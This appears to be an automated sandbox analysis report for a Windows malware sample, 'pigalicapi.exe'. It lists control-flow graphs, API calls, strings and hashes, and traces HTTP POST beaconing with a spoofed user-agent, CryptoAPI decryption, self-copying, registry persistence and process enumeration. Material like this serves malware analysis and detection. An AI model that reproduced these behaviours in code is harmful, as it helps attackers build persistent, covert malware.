                                                                                                                                                                                                                                                          control_flow_graph 450 13f1840-13f1854 451 13f185a-13f185e 450->451 452 13f1c95-13f1c9b 450->452 451->452 453 13f1864-13f1868 451->453 453->452 454 13f186e-13f1872 453->454 454->452 455 13f1878-13f190a call 13f7d20 InternetCrackUrlA 454->455 455->452 458 13f1910-13f1930 InternetOpenA 455->458 458->452 459 13f1936-13f1969 InternetConnectA 458->459 460 13f196f-13f19a7 HttpOpenRequestA 459->460 461 13f1c88-13f1c8f InternetCloseHandle 459->461 462 13f19ad-13f19e5 wnsprintfA HttpAddRequestHeadersA 460->462 463 13f1c7b-13f1c82 InternetCloseHandle 460->463 461->452 464 13f1c6e-13f1c75 InternetCloseHandle 462->464 465 13f19eb-13f19f9 462->465 463->461 464->463 466 13f19fb-13f19fe 465->466 467 13f1a04-13f1a26 InternetSetOptionA 465->467 466->467 468 13f1a30-13f1a75 call 13f7d20 HttpSendRequestA 467->468 471 13f1c4c-13f1c5f 468->471 472 13f1a7b-13f1aa1 HttpQueryInfoA 468->472 471->464 475 13f1c61-13f1c68 471->475 473 13f1ac9-13f1b0f call 13f7d20 HttpQueryInfoA 472->473 474 13f1aa3-13f1abc call 13f7dd0 472->474 481 13f1b47-13f1b6a VirtualAlloc 473->481 482 13f1b11-13f1b2d call 13f7dd0 473->482 474->473 480 13f1abe-13f1ac7 474->480 475->464 475->468 480->473 484 13f1c19 481->484 485 13f1b70-13f1b93 481->485 482->481 491 13f1b2f-13f1b39 482->491 487 13f1c23-13f1c4a InternetReadFile 484->487 486 13f1b99-13f1bc9 InternetReadFile 485->486 489 13f1bdb-13f1be2 486->489 490 13f1bcb-13f1bd9 486->490 487->471 487->487 492 13f1be6-13f1c11 489->492 493 13f1be4 489->493 490->489 491->481 494 13f1b3b-13f1b41 491->494 496 13f1c15 492->496 497 13f1c13 492->497 495 13f1c17 493->495 494->481 495->471 496->486 497->495
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 013F1902
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 013F191D
                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 013F1956
                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,*/*,00200300,00000000), ref: 013F1994
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 013F19C2
                                                                                                                                                                                                                                                          • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 013F19DD
                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 013F1A16
                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 013F1A6D
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 013F1A99
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 013F1B07
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 013F1B57
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 013F1BBF
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 013F1C3D
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 013F1C75
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 013F1C82
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 013F1C8F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                                                                                          • String ID: */*$0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                                                                                          • API String ID: 880997049-2033563659
                                                                                                                                                                                                                                                          • Opcode ID: 81f679526b273775d3d3495731b5c28d16a183dcd3e8caa06195f03f910907f7
                                                                                                                                                                                                                                                          • Instruction ID: f942338a105b131ac9bc8eea5d13f8c5840fa3e6fdfaec73aed63cb82fbd26bb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81f679526b273775d3d3495731b5c28d16a183dcd3e8caa06195f03f910907f7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3C1FAB1D4421CDBEB24CF54DC49FE9B7B9EB48708F0041D9E60DA6280DBBA6A94CF54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 536 13f47f0-13f4801 537 13f4aab-13f4ab1 536->537 538 13f4807-13f480e 536->538 538->537 539 13f4814-13f4832 CryptAcquireContextA 538->539 540 13f4856-13f485a 539->540 541 13f4834-13f483f GetLastError 539->541 540->537 543 13f4860-13f489d 540->543 541->540 542 13f4841-13f4850 CryptAcquireContextA 541->542 542->540 545 13f4a9f-13f4aa5 CryptReleaseContext 543->545 546 13f48a3-13f48f3 call 13f7b70 CryptCreateHash 543->546 545->537 549 13f48f9-13f4913 CryptHashData 546->549 550 13f4a90-13f4a96 546->550 553 13f4919-13f4944 CryptDeriveKey 549->553 554 13f4a83-13f4a8a CryptDestroyHash 549->554 551 13f4a9a 550->551 552 13f4a98 550->552 551->545 552->545 553->554 555 13f494a-13f498f CryptDecrypt CryptDestroyKey 553->555 554->550 555->554 556 13f4995-13f49b1 CryptCreateHash 555->556 556->554 557 13f49b7-13f49d4 CryptHashData 556->557 558 13f49da-13f4a0f CryptGetHashParam 557->558 559 13f4a76-13f4a7d CryptDestroyHash 557->559 558->559 560 13f4a11-13f4a3c CryptGetHashParam 558->560 559->554 560->559 561 13f4a3e-13f4a58 call 13f7c70 560->561 561->559 564 13f4a5a-13f4a72 call 13f7b70 561->564 564->559
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 013F482A
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 013F4834
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F4850
                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 013F48EB
                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 013F490B
                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 013F493C
                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 013F496F
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 013F4982
                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 013F49A9
                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 013F49CC
                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 013F4A07
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 013F481F
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 013F4845
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                          • API String ID: 2739279601-947817771
                                                                                                                                                                                                                                                          • Opcode ID: 1677f21811254c2be7ce67ac2b5770ffd15203e35685bc7ca2cfb7efc760321b
                                                                                                                                                                                                                                                          • Instruction ID: 7f97a20ac9943a1c69f98d2df887fc7657e36ce5e1d139afff3933029f4d7743
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1677f21811254c2be7ce67ac2b5770ffd15203e35685bc7ca2cfb7efc760321b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94713D71A40319ABEB25CB64CC49FEA777CAB48B04F00459CF709AA180DBB5DB88CF54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 626 13f3b00-13f3b5c call 13f1000 call 13f3130 call 13f2ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call 13f4510 635 13f400a-13f400c ExitProcess 626->635 636 13f3b62-13f3c8c call 13f7d20 call 13f5700 call 13f5a00 call 13f7d20 call 13f9400 call 13f99f0 call 13f6060 call 13f5e00 StrStrIA call 13f1120 call 13f5e30 call 13f6cf0 call 13f5f30 call 13f9b90 WSAStartup 626->636 636->635 663 13f3c92-13f3cb1 636->663 664 13f3cb3-13f3cbb 663->664 665 13f3cc0-13f3cc9 663->665 664->665 666 13f3ccb-13f3cd4 665->666 667 13f3cda-13f3ce3 665->667 666->667 668 13f3ce5-13f3cee 667->668 669 13f3cf4-13f3cfd 667->669 668->669 670 13f3cff-13f3d07 669->670 671 13f3d0c-13f3d15 669->671 670->671 672 13f3d17-13f3d20 671->672 673 13f3d26-13f3d2f 671->673 672->673 674 13f3d31-13f3d3a 673->674 675 13f3d40-13f3dfd call 13f7d20 call 13fa700 call 13fa4b0 call 13f5b50 call 13f8a70 673->675 674->675 686 13f3dff-13f3e3f call 13f7d20 call 13f78d0 675->686 687 13f3e49 675->687 686->687 689 13f3e53-13f3eab call 13f7970 call 13f4020 687->689 697 13f3f8a 689->697 698 13f3eb1-13f3ed9 call 13f4020 689->698 700 13f3f91-13f3f9a 697->700 706 13f3edf-13f3efa call 13f4020 698->706 707 13f3f81 698->707 701 13f3fed-13f3ffa Sleep 700->701 702 13f3f9c-13f3fa3 700->702 701->689 704 13f3fa5-13f3fac 702->704 705 13f3fd0-13f3fd7 702->705 708 13f3fae-13f3fc2 704->708 709 13f3fc4 704->709 705->701 710 13f3fd9-13f3fe3 705->710 713 13f3eff-13f3f07 706->713 711 13f3f88 707->711 714 13f3fce 708->714 709->714 710->701 711->700 715 13f3f09-13f3f50 call 13f42e0 call 13f4020 713->715 716 13f3f78 713->716 714->701 722 13f3f59-13f3f60 715->722 723 13f3f52 715->723 718 13f3f7f 716->718 718->711 724 13f3f76 722->724 725 13f3f62-13f3f70 VirtualFree 722->725 723->722 724->718 725->724
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 013F3B2D
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(013F5DB0), ref: 013F3B38
                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 013F3B40
                                                                                                                                                                                                                                                            • Part of subcall function 013F4510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 013F456C
                                                                                                                                                                                                                                                            • Part of subcall function 013F4510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013F458B
                                                                                                                                                                                                                                                            • Part of subcall function 013F4510: GetFileSize.KERNEL32(000000FF,00000000), ref: 013F45AD
                                                                                                                                                                                                                                                            • Part of subcall function 013F4510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F45D6
                                                                                                                                                                                                                                                            • Part of subcall function 013F4510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 013F4617
                                                                                                                                                                                                                                                            • Part of subcall function 013F4510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 013F463E
                                                                                                                                                                                                                                                            • Part of subcall function 013F4510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013F47C0
                                                                                                                                                                                                                                                            • Part of subcall function 013F4510: CloseHandle.KERNEL32(00000000), ref: 013F47E0
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 013F400C
                                                                                                                                                                                                                                                            • Part of subcall function 013F5700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 013F5742
                                                                                                                                                                                                                                                            • Part of subcall function 013F5700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 013F57B8
                                                                                                                                                                                                                                                            • Part of subcall function 013F5700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 013F57F1
                                                                                                                                                                                                                                                            • Part of subcall function 013F5700: wnsprintfA.SHLWAPI ref: 013F582F
                                                                                                                                                                                                                                                            • Part of subcall function 013F5700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013F5854
                                                                                                                                                                                                                                                            • Part of subcall function 013F5700: GetFileSize.KERNEL32(000000FF,00000000), ref: 013F586D
                                                                                                                                                                                                                                                            • Part of subcall function 013F5A00: lstrcpyA.KERNEL32(Gyifczkhyzuai,WDefault), ref: 013F5A47
                                                                                                                                                                                                                                                            • Part of subcall function 013F5A00: lstrlenA.KERNEL32(013FC4E0), ref: 013F5A7D
                                                                                                                                                                                                                                                            • Part of subcall function 013F5A00: lstrcpyA.KERNEL32(00000000,013FC4E0), ref: 013F5A97
                                                                                                                                                                                                                                                            • Part of subcall function 013F5A00: lstrlenA.KERNEL32(00000000), ref: 013F5AA1
                                                                                                                                                                                                                                                            • Part of subcall function 013F5A00: lstrlenA.KERNEL32(Gyifczkhyzuai), ref: 013F5AAE
                                                                                                                                                                                                                                                            • Part of subcall function 013F5A00: lstrcatA.KERNEL32(00000000,Gyifczkhyzuai), ref: 013F5AC8
                                                                                                                                                                                                                                                            • Part of subcall function 013F5A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 013F5B00
                                                                                                                                                                                                                                                            • Part of subcall function 013F5A00: RegCloseKey.KERNEL32(00000000), ref: 013F5B0E
                                                                                                                                                                                                                                                            • Part of subcall function 013F5A00: lstrlenA.KERNEL32(00000000), ref: 013F5B3B
                                                                                                                                                                                                                                                            • Part of subcall function 013F9400: lstrcpyA.KERNEL32(?,00000000), ref: 013F9513
                                                                                                                                                                                                                                                            • Part of subcall function 013F9400: CharUpperA.USER32(?), ref: 013F9521
                                                                                                                                                                                                                                                            • Part of subcall function 013F99F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 013F9A0A
                                                                                                                                                                                                                                                            • Part of subcall function 013F99F0: OpenProcessToken.ADVAPI32(00000000), ref: 013F9A11
                                                                                                                                                                                                                                                            • Part of subcall function 013F99F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 013F9A3A
                                                                                                                                                                                                                                                            • Part of subcall function 013F99F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 013F9A77
                                                                                                                                                                                                                                                            • Part of subcall function 013F99F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 013F9AAD
                                                                                                                                                                                                                                                            • Part of subcall function 013F99F0: EqualSid.ADVAPI32(?,00000000), ref: 013F9AC3
                                                                                                                                                                                                                                                            • Part of subcall function 013F6060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 013F6082
                                                                                                                                                                                                                                                            • Part of subcall function 013F5E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,013F3BEB), ref: 013F5E0C
                                                                                                                                                                                                                                                            • Part of subcall function 013F5E00: GetLastError.KERNEL32(?,013F3BEB), ref: 013F5E12
                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 013F3BFA
                                                                                                                                                                                                                                                            • Part of subcall function 013F1120: lstrlenA.KERNEL32(00000000), ref: 013F1148
                                                                                                                                                                                                                                                            • Part of subcall function 013F1120: lstrlenA.KERNEL32(00000000), ref: 013F115A
                                                                                                                                                                                                                                                            • Part of subcall function 013F1120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 013F1182
                                                                                                                                                                                                                                                            • Part of subcall function 013F1120: wnsprintfA.SHLWAPI ref: 013F11BD
                                                                                                                                                                                                                                                            • Part of subcall function 013F1120: lstrcmpiA.KERNEL32(00000104,?), ref: 013F11D1
                                                                                                                                                                                                                                                            • Part of subcall function 013F1120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 013F11F0
                                                                                                                                                                                                                                                            • Part of subcall function 013F1120: SetFileAttributesA.KERNEL32(?,00000006), ref: 013F11FF
                                                                                                                                                                                                                                                            • Part of subcall function 013F1120: lstrcpyA.KERNEL32(00000104,?), ref: 013F1210
                                                                                                                                                                                                                                                            • Part of subcall function 013F1120: lstrcpyA.KERNEL32(00000000,?), ref: 013F1249
                                                                                                                                                                                                                                                            • Part of subcall function 013F1120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 013F125D
                                                                                                                                                                                                                                                            • Part of subcall function 013F1120: CreateThread.KERNEL32(00000000,00000000,013F12D0,00000000,00000000,00000000), ref: 013F1274
                                                                                                                                                                                                                                                            • Part of subcall function 013F5E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 013F5E7E
                                                                                                                                                                                                                                                            • Part of subcall function 013F5E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 013F5EB2
                                                                                                                                                                                                                                                            • Part of subcall function 013F5E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 013F5ED6
                                                                                                                                                                                                                                                            • Part of subcall function 013F5E30: RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 013F5F0B
                                                                                                                                                                                                                                                            • Part of subcall function 013F5E30: RegCloseKey.KERNEL32(00000000), ref: 013F5F19
                                                                                                                                                                                                                                                            • Part of subcall function 013F6CF0: RegOpenKeyExA.KERNEL32(80000001,01403B88,00000000,000F003F,00000000), ref: 013F6D30
                                                                                                                                                                                                                                                            • Part of subcall function 013F6CF0: RegQueryValueExA.KERNEL32(00000000,01403FA6,00000000,00000003,?,00000020), ref: 013F6D61
                                                                                                                                                                                                                                                            • Part of subcall function 013F6CF0: RegDeleteValueA.ADVAPI32(00000000,01403FA6), ref: 013F6D7E
                                                                                                                                                                                                                                                            • Part of subcall function 013F6CF0: RegCloseKey.KERNEL32(00000000), ref: 013F6D88
                                                                                                                                                                                                                                                            • Part of subcall function 013F5F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 013F5F67
                                                                                                                                                                                                                                                            • Part of subcall function 013F5F30: lstrcatA.KERNEL32(?,01403FE2), ref: 013F5F7A
                                                                                                                                                                                                                                                            • Part of subcall function 013F5F30: RegOpenKeyExA.KERNEL32(80000001,013F3C58,00000000,000F003F,00000000), ref: 013F5FB3
                                                                                                                                                                                                                                                            • Part of subcall function 013F5F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 013F5FF2
                                                                                                                                                                                                                                                            • Part of subcall function 013F5F30: RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 013F603B
                                                                                                                                                                                                                                                            • Part of subcall function 013F5F30: RegCloseKey.ADVAPI32(00000000), ref: 013F6045
                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 013F3C85
                                                                                                                                                                                                                                                            • Part of subcall function 013F4020: InitializeCriticalSection.KERNEL32(?), ref: 013F4066
                                                                                                                                                                                                                                                            • Part of subcall function 013F4020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 013F407A
                                                                                                                                                                                                                                                            • Part of subcall function 013F4020: EnterCriticalSection.KERNEL32(?,?), ref: 013F40AF
                                                                                                                                                                                                                                                            • Part of subcall function 013F4020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013F40C6
                                                                                                                                                                                                                                                            • Part of subcall function 013F4020: TerminateThread.KERNEL32(00000000,00000000), ref: 013F40E6
                                                                                                                                                                                                                                                            • Part of subcall function 013F4020: ResetEvent.KERNEL32(00000000), ref: 013F40F7
                                                                                                                                                                                                                                                            • Part of subcall function 013F4020: LeaveCriticalSection.KERNEL32(?), ref: 013F4101
                                                                                                                                                                                                                                                            • Part of subcall function 013F4020: CreateThread.KERNEL32(00000000,00000000,013F4AC0,00000000,00000000,00000000), ref: 013F4118
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013F3F70
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 013F3FF4
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                          • String ID: Balucergobw$C:\Users\user\pigalicapi.exe$R+g$pigalicapi$svchost.exe
                                                                                                                                                                                                                                                          • API String ID: 1389186475-393868559
                                                                                                                                                                                                                                                          • Opcode ID: 5c90f78cc99d8168aedffc131d6ec09183c78dee94f3f02891e48b5606be4c60
                                                                                                                                                                                                                                                          • Instruction ID: e5e9fdbb33243658329318575d0f11a34e71e369c522f7ebf82d878bbddf2d8b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c90f78cc99d8168aedffc131d6ec09183c78dee94f3f02891e48b5606be4c60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63C17BB1A44325AAEB35EB6A9C09FBA7BB47B14708F0840FDE348661D5D7748788CF11
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 744 13f8800-13f8811 745 13f895c-13f8962 744->745 746 13f8817-13f881b 744->746 746->745 747 13f8821-13f8843 CryptAcquireContextA 746->747 748 13f887a-13f887e 747->748 749 13f8845-13f8855 GetLastError 747->749 748->745 752 13f8884-13f88b7 CryptGenKey 748->752 750 13f8857-13f885e 749->750 751 13f8860-13f8874 CryptAcquireContextA 749->751 750->748 750->751 751->748 753 13f88bd-13f88d7 CryptExportKey 752->753 754 13f8950-13f8956 CryptReleaseContext 752->754 755 13f88d9-13f88dd 753->755 756 13f8946-13f894a CryptDestroyKey 753->756 754->745 757 13f893f 755->757 758 13f88df-13f88e3 755->758 756->754 757->756 758->757 759 13f88e5-13f88e9 758->759 759->757 760 13f88eb-13f88ef 759->760 760->757 761 13f88f1-13f8914 CryptImportKey 760->761 762 13f893d 761->762 763 13f8916-13f8937 CryptExportKey CryptDestroyKey 761->763 762->756 763->762
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,013F8420,00000000,00001000,00000000), ref: 013F883B
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 013F8845
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F8874
                                                                                                                                                                                                                                                          • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 013F88AF
                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 013F88CF
                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 013F890C
                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 013F892A
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(?), ref: 013F8937
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 013F894A
                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013F8956
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 013F882C
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 013F8864
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                          • API String ID: 3052018297-947817771
                                                                                                                                                                                                                                                          • Opcode ID: 2047270a83f9ebca9f5dbfcad2741f62b079b14624bd228e8d69d1e4eb7f3059
                                                                                                                                                                                                                                                          • Instruction ID: 6d90a4ac56ee404126c918cbbda0ef1cb992d7857441a98d4e59582da5b80c4d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2047270a83f9ebca9f5dbfcad2741f62b079b14624bd228e8d69d1e4eb7f3059
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A411B71A4020AEFEB28CF98C849FEF7BB8BB44709F14855CF711AA280C7B59545CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 013F1CB1
                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 013F1CE1
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 013F1CEE
                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(000000FF,00000128), ref: 013F1D2E
                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 013F1D52
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,000000FF,00000128), ref: 013F1D78
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000204,?), ref: 013F1D92
                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 013F1DA6
                                                                                                                                                                                                                                                          • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 013F1DDC
                                                                                                                                                                                                                                                          • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,013F575B,00000000,?,00000004,00000000), ref: 013F1DFB
                                                                                                                                                                                                                                                          • GetProcessImageFileNameA.PSAPI(00000000,-00000204,013F575B,00000000,?,00000004,00000000), ref: 013F1E11
                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,013F575B,00000000,?,00000004,00000000), ref: 013F1E21
                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(000000FF,00000128), ref: 013F1E37
